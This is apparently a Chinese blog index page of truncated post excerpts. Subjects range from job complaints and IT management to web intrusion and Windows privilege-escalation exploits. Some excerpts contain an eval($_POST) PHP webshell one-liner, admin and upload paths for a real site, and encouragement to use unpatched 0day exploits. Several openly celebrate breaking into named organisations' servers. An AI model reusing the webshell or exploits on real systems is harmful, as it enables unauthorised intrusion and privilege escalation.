51CTO博客开发邵程程的有朝一日
哪些留给我们深刻印象的网站,硅谷、太平洋、中关村、168、小熊、天极,浓厚技术氛围气息遗失的美好!
初升的太阳照在脸上 也照着身旁这棵小树 亲爱的伙伴 亲爱的小树和我共享阳光雨露 让我们记住这美好时光直到长成参天大树
上传了个AspWebshell居然执行了代码,便想到利用它来包含生成PHP一句话。 具体说就是利用ASP语句嵌入创建一句话php版 代码内容: 例:<?php fputs(fopen(./p_w_upload/201011/x,w),<?eval($_POST[isun0804]);?>)?> 执行后在p_w_upload/201011/目录下生成x
最近心情烦闷,在网上找了很久发现符合自己要求的工作没几个要么就是学历太高(“211工程”毕业)要么就是没啥技术含量只适合混不能久做。无聊得很顺手选了两个网站做下测试以下简称1号与2号 1号站国家某科研机构曾获多项专利,大概看了下好像没什么问题,于是发动搜索引擎居然存在线文件编辑器漏洞并且有人已经来过了,进入webshell试了下万能密码结果成功并进行相关分析得出结论Win
NO.10 “上班时间聊天、煲电话,甚至干私事” ★ 大学生都这样简称大学流,不过女生较多如此。 天底下没有一个老板愿意雇用一个上班时间一直干私事或谈山海经的员工,天底下也没有一份既可以让你上班时自由自在、为所欲为,又可以领到高薪的工作。如果被你找到这么一份舒适的工作,那你一定是史上最“幸运”的人了! 注:国企都这样 N
起因:今天在网上闲逛时看到了万网G享主机的广告于是乎就有了下面的结果,路过留了个纪念! 无意得到一个网站的数据库信息里有 百度了一下发现为万网G享主机数据库链接地址 mysql:dmc-01.hichina.com 网上下了工具连上看看 发现已经有人来过了今年5月6日17点5分左右,还在网站里传了两个马。 思来想去觉得涂鸦挂马劫持之类的没什么意思,写在博客里给大家提个醒,网络安全意
0DAY代码: From:digua # Title: BaoFeng Storm M3U File Processing Buffer Overflow Exploit# EDB-ID: 12516# CVE-ID: ()# OSVDB-ID: ()# Author: Lufeng Li and Qingshan Li# Published: 2010-05-06# Verified: no
爆库地址:http://****.cctv.com/ChinvanAdmin/ckfinder/后台地址:http://****.cctv.com/ChinvanAdmin/login.aspx文件上传地址:http://****.cctv.com/ChinvanAdmin/ckfinder/ckfinder.html 有图为证: PS:此漏洞真的很弱智,天下程序一大抄,拿过来就用也不看是否安
近日,微软公司证实IE浏览器存在一个“F1按键”漏洞,大家近期上网时尽量不要按“F1”键,否则有可能触发木马攻击;这个“F1按键”漏洞存在于IE6、IE7、IE8浏览器中,目前微软尚未提供补丁。原理是通过IE浏览器和“Windows帮助程序”互动时的漏洞来实施的。F1按键本来用于快速打开帮助菜单,此时却变成了黑客设下的圈套,黑客利用伪装的“帮助”程序诱使用户按下F1键后,即可通过该漏洞执行恶意代码
磁盘主引导记录(MBR)简介: MBR(Master Boot Record),中文意为主引导记录。电脑开机后,主板自检完成后,被第一个读取到的磁盘位置。硬盘的0磁道的第一个扇区称为MBR,它的大小是512字节,它是不属于任何一个操作系统,也不能用操作系统提供的磁盘操作命令来读取。DOS时代泛滥成灾的引导区病毒多寄生于此。 电脑系统开机过程介绍: 开启电源开机自检-->主板BI
漏洞简介:向瑞星内存地址不断写入代码使其出错退出,木马病毒首选测试代码: DWORD GetProcessIdFromName(LPCTSTR name) { PROCESSENTRY32 pe; DWORD id = 0; HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0); pe.dwSize = si
记得N年以前一起住并在同一家培训中心学习的一个本科男,在三好街上班他所在公司有块硬盘挂到机器上不能用看不到硬盘分区但是BISO可以检测到,拿回家当时它的电脑系统是win98挂上就好用了。结果呢他公司的技术经理就问你怎么解决的,他说放到机器上就好用了我的机器是win98系统,结果呢技术经理认为系统换成win98的就能解决了技术经理就安装了win98把被锁的硬盘挂上了但还与以前一样,又问他这怎么回事,
域名注册服务商Register.com存在安全漏洞,在未经授权在情况可更改域名相关信息。要是早知道百度的域名注册服务商是它早就黑了,没想到百度选像大萝卜一样脆像熟牛肉一样有味道肉包子打狗一去复返的域名注册服务商无语,说实在的这个漏洞存在有三五年了至少我发现的时候是这个样子也许更早些,当然不只这一个还有很多漏洞。比较严重的一个漏洞差不多会导致半数以上的人上不了网也许更糟,与根服务器互联网节点有些关系
这是刚过年不久渗透测试,居然只花了22分钟.....就成功了做安全的公司服务器很不幸的是豆腐渣工程!不想说太多 PS:.NET为啥就那么脆呢,难道它是一盘大萝卜!
360本地提权代码: 测试方法:在webshell下运行360test.exe成功后,3389到服务器,按5下shift,得到一个cmd 360在服务器的普及率也高的惊人至少有80%,很多肉鸡终于找到家了。 大家可以参考下网上的360 0day漏洞及相关内幕等文章,360很多dll存在类似的调用问题。据360的公告介绍已经打补丁了,具体是真是假,大家自己试试这
工作也有一段时间了,有点怀念以前的日子帮同学工作就是有什么搞不定的IT技术问题找我。记得N年以前同学所在的公司接了沈飞集团某部IT外包,遇到一个问题就是U盘打不开里面有重要的设计图纸,高级机密具体是什么我就多说了。当时他搞了半天没解决,急得他满头大汗,掏出手机给我挂电话,对我简单说了下情况让我去帮他搞定对方不让他走,我坐公交去了具体哪趟车不记得了反正是到了,把U盘插在电脑上一看真的打不开,看了下机
主要是有以下几种: 1、推脱型: 这个程序不可能是我们的问题,你搞错了吧不用说了也不用谈之类。 2、无赖型: 你好心帮他把漏洞修补好,反而认为你是竞争对手派来的,而且还要把你交给公安机关。 3、视而不见型: 你与对方聊天怎么样不停的用感叹词“哦、嗯”回复你。 4、热情奔放型: 有问有答,表示要当面请你吃饭非常客气,问你工作怎么样,来我们公司吧! 5、回报型: 提醒程序有漏洞,他
1、在发布招聘信息,要写清楚公司需要的什么样的人,有什么样的具体要求,特别是不要发错地方如:明明是要招聘厨师,本应发餐饮但居然发到IT类。汗! 写清楚需要什么能力,比如:要招聘店面技术,公司是做什么的,如装机店;技术需要负责哪些工作,如要求:对计算机便件充分了解,熟悉WINDOWS操作系统与日常软件的安装并有能力解决工作出现的故障,简单的小型网络搭建;有独立布线、路由器&交换机设备调试经
Windows NT/2K/XP/2K3/VISTA/2K8/7 NtVdmControl()->KiTrap0d local ring0 exploit原作者联系方式:taviso@sdf.lonestar.org 此版本以这位GOOGLE黑客高手Tavis Ormandy的大作为基础改写而成.修改部分如下: 1:根据作者个人遗憾的几点做了改进,避免了因NT系统的目录差异而失败的情况.
一网络管理: (一)、人为因素: 1违规操作 1、访问不良网站出于好奇或其它原因,或无意不正确下载资料反而下载了大量的恶意软件,导致系统出现不可预测的多种问题。 2、对办公设备未按操作流程规定实施导致损坏,需要对相关人员对专业的培训实施扫盲行动 建立完善的责任体系落实到个人身上。 (二)、服务器硬件质量问题:非原厂产品,而是OEM产品或普通PC硬件,特别是主机电源。由于多种原因采购人员
存在17年的漏洞编译至今通杀测试英文版系统user提权没问题中文有的会蓝屏 有的直接提权 国外相关资料 此漏洞导致大部分系统可以提权,目前还没出补丁,及时利用吧。 windows最新0day 通杀所有版本通杀 XP 2K 2K3 2K8 VISTA WIN7用法:以普通用户登录 windows执行exp 弹出一个cmdshell 这个shell即为 system权限的
------------------------------------------------------------------------------------| Title | Hash Algorithm | Prefix | Table |-------------------------------------------------------------------------
下面是FTP的一些攻击命令: 1.![cmd[args]:在本地机中执行交互shell,exit回到ftp环境,如:!ls*.zip 2.$ macro-ame[args]: 执行宏定义macro-name。 3.account[password]: 提供登录远程系统成功后访问系统资源所需的补充口令。 4.append local-file[remote-file]:将
关于认为我什么都不会的领导说我只懂理论不行,下面的这些问题是谁解决的呢?1、客户的DELL笔记本做系统后出现故障无法上网(客户找了五六家公司没解决),最后解决问题的人是我。在没有人动的前提下难道您认它放在公司里能自动修好不成,如果您认为可能的话我觉得贵公司可以不必雇佣任何人,您一个人就足够了!我想问一句"您了解这门技术吗,真的懂吗?"2、公司采购项目所需IT产品是谁走访许多厂家寻得底价,使公司获得
1、房地产行业: 浙江富豪投资房产失败卷款亿元外逃 常德开发商“瑞祥·凯特国际”卷款五千万跑路 2、金融行业某领导因贪污卷款跑路 3、运输行业: 佳时达快递老总卷款跑路了,拖欠工资上千万 沈阳的天天货运公司卷款跑路 4、教育行业 凯恩英语倒闭 老板卷款跑路 5、电子行业 打着“破产”幌子卷款跑路 柏皇电子老总“涉嫌诈骗”被境管 6、餐饮行业 上海逸麟蒸菜餐厅卷款跑路 超市老板卷款
昨天晚上7点多从工地回住的地方,为了有一个座位,我特地走了2站路,走到224路的起点站,又在起点站排了10多分钟的队,等了一辆有座位的车才上车。 坐了4站路,我身边站了一个看样子60岁左右的老人,他几乎靠到我身上了,我故意闭上眼睛装睡,因为我实在不想让座——如果你们城里人也去工地上干上一天,你就会明白为什么我不想让座了。 过了几分钟,有人敲我的肩膀了,我只有睁开眼睛,看到有一个膀大腰圆,戴副眼睛的
Copyright © 2005-2025 51CTO.COM 版权所有 京ICP证060544号
